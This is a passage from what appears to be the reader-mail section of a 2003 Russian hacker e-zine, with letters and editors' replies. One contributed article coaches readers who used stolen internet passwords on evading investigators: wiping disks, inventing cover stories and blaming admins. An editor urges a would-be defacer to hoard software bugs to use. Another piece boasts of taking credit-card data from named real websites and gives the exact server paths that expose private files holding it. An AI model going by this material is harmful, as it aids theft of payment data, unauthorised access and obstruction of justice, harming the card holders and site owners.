приветствуем, но никто тебе этого запретить не сможет, верно??
2. приветствуются любые статьи, которые, по нашему мнению, будут полезны
окружающим, так что пиши
3. ну тут уж мы тебе ничем помочь не можем, либо у тебя есть идеи, либо нет, у
нас нету госзаказов от ЦК КПСС ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Тема: rогда выйдет новый журнал?
От: John Dekker <[email protected]>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Wazz Up, defaced_staff!
Доброго времени суток!
Приятного прочтения:
Очень заинтересовался, а вот нового ничего от вас нету...
В душе слышны отгооски: Mudvayne - World so cold
------=======::.!| WLH of M |!.::=======-------
С уважением, из DeepTown'а, Dr. John Dekker.
mailto:[email protected]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ если ты сейчас читаешь эти строки, то надо полагать что он уже вышел. мы сами
не знаем точных дат выхода очередного номера, поскольку свежий номер выходит по
мере накопления материала. вообще ориентируйся на промежуток два месяца после
выхода журнала, а ничего точнее сказать не можем ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Тема:
От: Best Mowi <[email protected]>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Клэшмастер!
Ты своей ... весь третий выпуск опустил,
Лого из третьего ~el8'а вырезал!!!
to Defaced staff:
Ну нельзя ведь парни такой беспредел допускать :( - рук
что-ли своих нету или умения.
CUL!
from b3$t_m0w1...
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ угу, заметили это слишком поздно.. ну ничего, будем бдительнее ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Тема: hi!
От: John Dekker <[email protected]>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Здравствуйте, defaced_staff.
Приятно видеть соотечественника, как понимаю, извиняюсь не соотечественника а
мыло вашего журнало в KZ. Я сначало подумал, что это отдельный мэмбер из вашего
состава. Поинтересуюсь: а почему на KZ? Ну а если есть господа из Бескрайнего
Казахстана, то очень хотелосьбы связаться... пивка хлебнуть, хотя сам я
предпочитаю безалкогольные напитки. Правда узнал о журнали лишь при выходе #3, и
то благодаря Void.ru. Приятно было ознакомится с чемто новым.
Собственно пишу зачем всем довно известно что наконец вышел в свет RTK: Russian
Trinux Kit - то бишь первый российский дистрибутив ОС Linux хотелосьбы
поссмотреть что за зверь и с чем едят:) вот только проблематично достать диск...
может можно откуда нибудь слить? Или у кого поблизости есть? Созвонимся
договоримся... У меня иНэт ограничен, так где мог порылся ненашел, может так
договоримся с кем ни-дь но не за 300р естественно :) хотя...
http://itsecurity.groteck.ru - не посоветуете откуда можно слить? Каталог
«Средства и системы защиты информации (IT-Security)»?
Ваш журнал меня приятно порадовал, может даже статейку подкину... Кстати у вас
на Форуме прям так сказать фрэйма до кучи... а про RPC - от MS MustDie не будите
от себя чего ни-дь добавлять? Наверное нет, смысла нет, итак уже куда не
кликни... , хотя кто знает - кто знает ;)
Может как ни-дь вдохновлюсь на статью... помнится как то написал пару статей в
один не мало известный журнал им там что-то непонравилось а через полтора месяца
чуть подизменили и отчепятали в свет - подлецы... надеюсь у вас такого нету...
неуважения...
А насчёт D2_21 то могу сказать что я считаю себя Кибер Панком, а если кто-то там
когото огорчает и нагоняет пургу на Киберов - ][акеров - Кодеров - Декодеров - и
пр. андеграунд. то пусть заткнётся(придержит своё менение при себе), я сам
пострадал от подобныз "злых языков". Был тут такой случай в Казахстане, в одной
немало известной газете обго*няли "честной" народ так скаазть, ну и поплотились,
правда потом извинились, а поплатились здоровьем одного из своих
журналистов-умников. Просто народ то мирный но всему бывает предел, особенно
когда репутацию твою парочат, не каждый стерпит... Кстати встречал пару
Киберов(я просто весь андеграунд к CyberPunk's отношу) которые спокойно живут
себе при так сказать "Братве" работают на них, живут обеспеченно и с властями
нету проблем, но вот они сталь от денег зависеть и короче теперь и нездороваются
даже... зазнались, вот "зазнавшихся" тоже как-то уважать нехочется... понятно
почему.
D2_22 Даа тут примеров до ж[beep]ы можно приводить. Ну прям задели за живое...
Моё мнение всётаки по Этикету и Слову "][ацкер". Лично мая позиция относительно
этикета: Мой принцип это принцип свободы и справедливости, хотя на данный период
меня больше заботит Финансовая сторона, т.к. жизненнный период такой сейчас, у
меня. Я согласен с мнением subj'a. На мой взляд при дефейсе нужно зарабатывать
деньги(на black day), набираться опыта и помогать людям... ну ест-но если
досадили то из мести(дабы установить справедливость или правду относительно
своей точки зрения). Да и на кой чёрт светится(оставлять яркие данные о себе)?!
Я вот имею опыт общения с КНБ в нашем Казахстане, хватило на всю жизнь. Правда
могут ещё и найти типа "админы" и за rm /-rf кое чего ототвать ненароком... ну
до это го обычно недоходит. Относительно известныз групп, то ребята до того как
стать известными, не очень то и сейчас светятся. Просто нужно придерживаться
человеческих моралей и быть более человечным. ][ацкер - бедное избитое слово...
его вообще очернили и на сегодняшний день как-то и называть кого-то из друзей
"хакером" не получается огорчаются сразу, говорят мол "чего обзываешься" :) ну а
вот объяснить что-то общественности кроме как без этого слова у СМИ не
получается. Кстати не замечал ни одной статии или передачи В СМИ где Хакеров
назвали хорошими, появился новый червячёк или какая новая инфекция, то сразу
кричат у это подлецы Хакеры! Кстате заметте, нигде неупоминается о Кардерах,
Киберах, Крякерах, Дифейсеров и др. всё подгребли под одну гребёнку!
Как то зашёл спор у нас на паре в институте, что ж такое хакер и хакинг так
выяснелось такое!!! уууу или вот например монолог из IRQ двух знакомых, до этого
монолога я считал второго опанента стоишим челом, хотя в итоге оказалось... :(
<2> hello как дел? Что нового? Чем занимаешься?
<1> hi всё норм. Инфа да софт есть новые, новости всякие. В Perl'e прусь :)
Читал Phrack?
<2> нет
<1> Так читай попыраму! Новый #61 лови... (10 секунд полёт нормальный:)
<2> и что... мне, например, хакерство на данном промежутке времени абсолютно
параллельно... меня больше кодинг интересует...
<1> %/ НУ хакерство и программирование идуи в ногу если что(как соль и перец).
Ну там и по программированию кое-что есть... в #61
<2> то две разные области, если что... просто в них есть моменты, где они
пересекаются... и всё... Ладно. Переформирую ответ. Меня интересует прикладное
программирование. Пойдёт???
<1> ДА а в чём собственно трабл. Да хоть и Прикладное. Я ведь тебе не про шелы
говорю. Да и прикладное это очень расплывчетье понятие. Ты уверен что у тебя
нету в твоём "прикладном" исходе ошибки переполнения?!!?? На мой взгляд хак это
как сказать то, ну тут нужно во всём, так сказать всё взаимосвязано между собой!
Верене даже не хак, с другой стороны компитентность в разных областях например в
security...
<2> хакинг - это по большей чести область сетевого (и социального)
программирования... Меня интересует система... И вообще отстань ты от меня... не
читал, и пока не собираюсь...
<1> Откуда такая осведомлённость. Хакинг это..... - глупо и неправельно, я
несогласен. Ладно не кепетись. отстаю хотя я разачерован подобного родом ответа
от тебя совсем уже все мозги прое[beep]л! Ты же знаешь что я ваабще... ладно
замяли...
В общем если что, неак звиняйте. Может кто и себя узнает... неисключаю такой
возможности, может кто меня узнает >:).
Кстати Федералам (спец службам) абсолютно по XY* кто gray hats, white hats или
чёрный... для всех один УК.
Заранее спасибо!
В душе слышны отголоски: Enya - One By One
--
С уважением,
John mailto:[email protected]
This message is for the designated recipient only and may contain privileged,
proprietary, or otherwise private information. If you have received it in error,
please notify the sender immediately and delete the original. Any other use of
the email by you is prohibited.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ ну, во-первых, мы не из .kz, а ящик там был зареган в результате работы
функции wrandom() ). что касается RTK - я живу не в .kz, поэтому не могу знать у
кого записать. попробуй спросить на hackdocs.host.kz, хотя сомневаюсь что там
кто-нибудь знает о чем речь. где каталог этот качать не знаю, так как не
интересует. насчет КНБ мог бы и статейку написать - случаи встреч со
спецслужбами всегда интересны и поучительны ). спасибо за письмо! ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
От: Lawyer <[email protected]>
Дата: 11/19/2003 22:50
Тема: contribution
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Привет!
Вот еще одна моя статейка! Т.к. в числе вашего журнала есть и новичики, для них
эта статья будет-полезна!
Если тебя поймали.
Автор: Lawyer [[email protected]]
Сайт: www.mol.dax.ru
Однажды бродя по этому до боли знакомому инету я наткнулся на один форум где
тусуются юристы и адвокаты, и в этом форуме была тема "Преступление в сфере
высоких технологий", я был бы не я если бы не зашел посмотреть что они там
обсуждают. Обсуждали они банальную тему, а именно "Использование чужих паролей
для выхода в инет". Первая мессага с которой началось обсуждение этой темы
датировалась 14.01.2003, а последняя мессага в этой теме была датирована
8.11.2003 - сразу видно что обсуждение было не из маленьких. Читал их мессаги
как художественную книгу - несколько дней! Наконец когда я прочитал всю тему то
понял что можно написать полезную статью на эту тему, т.к. форум это был для
юристов и следовательно обсуждали эту тему - юристы, которые лучше нас
разбираются в законах. Также прошу обратить внимание, то что обсуждали то когда
чужой пароль вам дали/подарили или еще что ни будь, то есть вы не взламывали
комп на котором хранились пароли и не копировали pwl-файл, а то что вам просто
кто-то его дал в чате/форуме.
Вот вы сидите в кабинете у следователя (ощущение не самое из приятных - сам там
бывал однажды), он начинает вас расспрашивать. Начнет он свой допрос скорее
всего как ты получил чужой логин/пароль на инет. Есть несколько вариантов
ответа: 1). Сказать что в одном из чатов/форумов кто-то выклал пароли и сказал,
что это тестовый доступ и юзать его можно хоть сколько. 2). Сказать что нашел на
одном из сайтов. Легенда: искал тестовые доступы в интернет, и попал на какой-то
сайт там давался список паролей и было написано то что это тестовые доступы
провайдеров и что за их использования ничего не будет.
Следователь может сказать что ты все равно использовал чужие пароли несмотря на
то, что кто то тебе дал или ты их нашел на сайт и зачитает тебе знаменитую 272
статью:
"Статья 272. НЕПРАВОМЕРНЫЙ ДОСТУП К КОМПЬЮТЕРНОЙ ИНФОРМАЦИИ
1. Неправомерный доступ к охраняемой законом компьютерной информации, то есть
информации на машинном носителе, в электронно-вычислительной машине (ЭВМ),
системе ЭВМ или их сети, если это деяние повлекло уничтожение, блокирование,
модификацию либо копирование информации, нарушение работы ЭВМ, системы ЭВМ или
их сети, - наказывается штрафом в размере от двухсот до пятисот минимальных
размеров оплаты труда или в размере заработной платы или иного дохода
осужденного за период от двух до пяти месяцев, либо исправительными работами на
срок от шести месяцев до одного года, либо лишением свободы на срок до двух лет."
Как я понял из форума использование чужого пароля если он был получен на
сайте/форуме/чате то есть ты ничего с компа жертвы не копировал и не взламывал
его комп, не подходит к этой статье УК, т.к в ней говорится о взломе/копирование
инфы с компа - жертвы, а ты пароли получил с сайта/форума/чата. Тебе эти пароли
дал кто то другой и ты никаким образом не участвовал в их получение. Цитирую
сообщение с форума юристов: "Использование найденного логина не опаснее
использования найденного кошелька." и вот еще одно сообщение с форума: "Пароль
мог быть переписан с обоев пользователя, а не из его ЭВМ" Т.к. обои не являются
ЭВМ, то и никакого доступа к ЭВМ-потерпевшего НЕБЫБЫЛО!
Следователь также может сказать что есть логи провайдера в котором указанно то,
что ты выходил в инет с помощью украденного пароля. Цитата с форума: "На
основании одних данных провайдера ничего доказать не удастся (а может это он
подменил? а кто его уполномочивал на отслеживание? а сертифицировано ли
соответствующее оборудование? а может это были телефонные пираты, подключились к
телефону и ходили в инет? и т.д. и т.п.).
Поэтому в этих случаях всегда изымается системник "халявщика", и уже по логам и
соединениям на его компьютере делается вывод о его причастности." Из этого
следует: удали всю инфу с компа (Format C: - не поможет), для этого есть много
прог и способов - поищи в инет, их там полно! И с чистой совестью и чистым
винтом с которого не возможно восстановить инфу говори про то, что админ сам мог
изменить логи или это были телефонные пираты которые подменили номер телефона.
Есть также вариант что следователь скажет что хоть ты и не копировал чужие
данные, но зато когда ты пользовался чужим паролем который ты достал на
сайте/чате/форуме настоящий пользователь пароля пытался выйти в интернет, но не
мог выйти в инет по той причине, что в инете был ты, то есть ты не дал выйти
пользователю в инет, заблокировав доступ в инет тем что ты сам был вместо него в
инете, а это блокирование информации что попадает в 272 статью. Этот вопрос тоже
обсуждался на форуме. Цитата из форума: "Доказать то что пользователь не мог
выйти в инет по той причине что ты сидел за его счет, практически невозможно".
Вы наверное слышали про то что "Вы имеете право хранить молчание". Вот что
написал один из адвокатов: "Подзащитный занимался рассылкой зараженных писем,
потом собирал пароли. На допросах молчал как рыба об лед, ничего доказать не
смогли."
Напоследок:
Как сказал один из юристов "Под 272 статью может попасть кража паролей, но никак
не их использование."
Также мне известно то, что кроме следователя, и подозреваемый может задавать
вопросы которые ему на руку, экспертам которые проверяли комп. Можно также
подать ходатайство об отводе эксперта и предложить другого.
Если у тебя заберут системник, то обрати внимание на способ опечатывания
системника. Опечатывать должны так, чтобы полностью исключить возможность
модификации информации после изъятия. Посмотри внимательно! Особо обрати
внимание, чтобы опечатали так чтобы нельзя было снять крышку системника и
вытащить винт с последующей модификацией.
Думаю не надо упоминать о том что если дело дойдет до суда, то надо нанять
адвоката КОТОРЫЙ РАНЕЕ ИМЕЛ УСПЕШНЫЕ ДЕЛА В ЭТОЙ СФЕРЕ и советоваться во всем с
ним, также своему адвокату можно показать эту статью.
Все что ты здесь узнал, применяй не только при следователе, но и в суде! Удачи!
P.S: Подумай хорошенько прежде использовать чужой пароль: Стоит ли пара часов
халявного инета несколькими годами сидения в тюрьме, ведь все может закончится
не очень хорошо и ты испортишь всю свою жизнь своей глупостью. Лучше купить
анти-лимит чем так сильно рисковать!
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Тема:
От: popo dargon <[email protected]>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Здравствуй.
Буду краток. Довольно давно я ищу информацию о дефейсах страниц. В большинстве
своём, советы/статьи поделились на 3 категории:
1)учи языки, думай->всё будет;
2)defaced;
3)чушь собачья.
Зная(понимая, изучая, используя) высокоуровневые языки и не будучи последним
дебилом, я ни хрена не могу сделать. Короче ни теории, ни практики...(defaced
редко выходит, но гостевые вволю поломал)
Помог бы чем-нить?
Будет время, черкни ответ.
Пока.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ запишись в какую-нибудь более-менее известную команду - как правило они имеют
средства/методы достижения твоей цели. раз знаешь языки, ищи баги в софте, и
откладывай в свою копилку, так или иначе ими воспользуешься ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Тема: дрямс
От: c0d3x <[email protected]>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Hello d3f4c3d,
статейку дадите почитать хоть до релиза журнала ? а то интересно, много нового
про себя могет узнаю.
--
Best regards,
c0d3x mailto:[email protected]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Тема: contribution
От: bug durito <[email protected]>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Тема.......К вопросу о том, где лежат кредитки.
Автор......bug durito
[email protected]
HTTP.......http://durito.narod.ru
DATE.......1.11.2003.
# перепечатка с сохранением авторства поощеряется РЕВТРИБУНАЛОМ
Как-то получив немного кред с http://www.swimamerica.org/, увидел я на нем линк
на http://www.swimmingcoach.org/. И решил durito проверить, не одни ли кривые
руки, принадлежащие админу http://www.swimamerica.org/, настраивали и этот
сервер. Кривые руки оказались те же. Только вот информация по сс лежала не в
metacart/database/mcart2.mdb, как это было http://www.swimamerica.org/, а в
малопримечательных файлах с названиями:
wcreg2002_results.txt
sescc_reg.txt
savideo_orders.txt
samonth.txt
member_form.txt
chevron.txt
babies_results.txt
altst_join.txt
правда расположенных в директории /_private/. Они и сейчас там лежат. Узнал я об
этом из файла author.log полученного по запросу:
www.swimmingcoach.org/_vti_log/author.log
ту же самую информацию ты можешь получить из файла:
http://www.swimmingcoach.org/_vti_pvt/writeto.cnf - только в IE ты его не
откроешь, придется скачать на винт. Вот тебе его содержимое, для кропотливого
анализа ;-)
______________
_private/sic7result.txt: collegesTiJimming/sicS.htm
fpdb:global.asa collegesTiJimming/sicS.asp salary.asp
_private/Jobsvc_net.txt:jobservice/job_net_questions.htm
_private/audio_sales.txt:worldclinic/ASCA99/asca99_audio.htm
_private/survey.txt:jobservice/salary.htm
_private/Mc2000_registration. txt: Tijorldclinic/asca2000/asca2000_packets . htm
_private/form_results.txt:jobservice/02salary.htm
_private/article_results.txt:ALTST/past_articles/altst_4.htm ALTST/past_artide;
pbsurvey.txt:water_depth_rule_questionnaire.asp
_private/cert_up.txt:forms/certupgrade.htm
_private/Mcreg2002_results.txt:worldclinic/ASCA2002/registration2.htm worldclin:
_private/emembers.txt:articles/9903/9903-4.htm articles/9903/9903-5.htm article;j
_private/jobsvc_net.txt:jobservice/job_net_questions.htm
_private/certificaion_orders.txt:ASCA_Catalog/certification_0rder.htm
_private/ameridome_leads.txt:ameridome/ordering.htm
_private/feedbackl.txt:forms/feedback.htm
_private/bkcatalog.txt:ASCA_Catalog/catalog.htm ASCA_Catalog/images/catalog.htm
_private/wc2000_Registration.txt: worldclinic/ ASCA2000/asca2000_packets.htm
_private/sicSresult.txt:sicS/default.htm
_private/sescc_reg.txt:forms/STiJscc_reg.htm
_private/chevron.txt:forms/chevform.htm
_private/sicord.txt:ASCA_Catalog/sicord.htm
_private/samonth.txt:forms/samonth.htm
_private/altst_jоin.txt:ALTST/ALTST_Join.htm
learning_center:global.asa
SurvivalKIT:survivalkit.asp
_______________
твой bug Durito.
_________________
Eath The Rich!
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
.:EOF:.
